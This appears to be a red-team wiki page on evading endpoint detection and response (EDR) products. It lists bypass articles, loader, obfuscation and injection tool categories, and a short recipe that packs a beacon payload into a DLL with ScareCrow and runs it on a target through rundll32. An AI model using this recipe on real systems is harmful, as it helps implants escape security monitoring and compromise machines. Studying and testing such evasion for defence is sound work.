Skip to main content Link Menu Expand (external link) Document Search Copy Copied

pen / edr / evasion

MENU

MUST-WATCH

🔥 GEMINI YT Channel 🔥

🔥 CMEPW BypassAV mindmap 🔥

_repo_last_pushed_stars_watch_language

articles

DateEDRVersionBypassAuthor
2023-02Palo Alto XDR-auditconf 
2022-09Palo Alto XDR7.8.0regnreboot@bentamam
2022-03ALLALLreflectiveDumps3cur3th1ssh1t
2021-10Windows Defenderxviperone 
2021-07Palo Alto XDR7.4.0privescndisable@mrdox
2021-02ALLALLscarecrow part 1Optiv
2021-02ALLALLscarecrow part 2Optiv
2020-11Phantom-xxx 

eol

tools

all-in-one

_repo_last_pushed_stars_watch_language

dropper

_repo_last_pushed_stars_watch_language

manual-loader

_repo_last_pushed_stars_watch_language

automatic-loader

_repo_last_pushed_stars_watch_language

generate-shellcode

_repo_last_pushed_stars_watch_language

manual-obfuscation

_repo_last_pushed_stars_watch_language

automatic-obfuscation

_repo_last_pushed_stars_watch_language

process-injection

_repo_last_pushed_stars_watch_language

detect-vm

_repo_last_pushed_stars_watch_language

from-pe-to-shellcode

_repo_last_pushed_stars_watch_language

from-alive-beacon

_repo_last_pushed_stars_watch_language

recipes

# generate the shellcode
./ScareCrow -I beacon.bin -domain -Loader dll -Exec VirtualAlloc

# target machine: run the shellcode
rundll32.exe  helloworld.dll, DllRegisterServer